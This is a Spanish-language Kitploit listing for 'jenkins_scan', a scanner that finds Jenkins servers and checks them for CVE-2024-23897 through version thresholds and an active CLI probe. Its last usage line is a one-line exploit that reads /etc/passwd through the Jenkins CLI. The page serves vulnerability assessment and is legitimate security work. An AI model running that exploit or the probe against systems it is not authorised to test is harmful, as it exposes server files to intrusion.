Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
jenkins_scan — Encuentra entornos de Jenkins y comprueba la presencia de CVE-2024-23897 | Kitploit
Herramientas/GitHubGitHub/w41l3r/jenkins_scan
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubw41l3r/jenkins_scan

jenkins_scan

Encuentra entornos de Jenkins y comprueba la presencia de CVE-2024-23897

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

jenkins_scan

Encuentra entornos Jenkins y comprueba el CVE-2024-23897

Cómo funciona

Detección de Jenkins

Prueba las rutas: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

Identifica vía:

  1. Header X-Jenkins — más confiable, también devuelve la versión
  2. Header X-Hudson — instancias más antiguas
  3. Body HTML — cadenas como "login to jenkins", "hudson.model", etc.
  4. /api/json — confirma por la estructura JSON (_class, jobs, views)

Verificación del CVE-2024-23897

Pasiva (por defecto): compara la versión detectada con los umbrales:

  • Weekly: < 2.442 → vulnerable
  • LTS: < 2.426.3 → vulnerable

Activa (--active): envía el handshake del protocolo binario del Jenkins CLI sobre HTTP. Si el servidor responde 200 + Content-Type: application/octet-stream, confirma que el canal CLI está abierto y el exploit es aplicable.

Uso

Escaneo básico

python jenkins_scan.py -f urls.txt

Con sonda activa + Burp como proxy + salida en archivo

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20 threads, verbose, sin color (para pipe/grep)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

Confirmar exploit manual en objetivo vulnerable

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

Descargar herramienta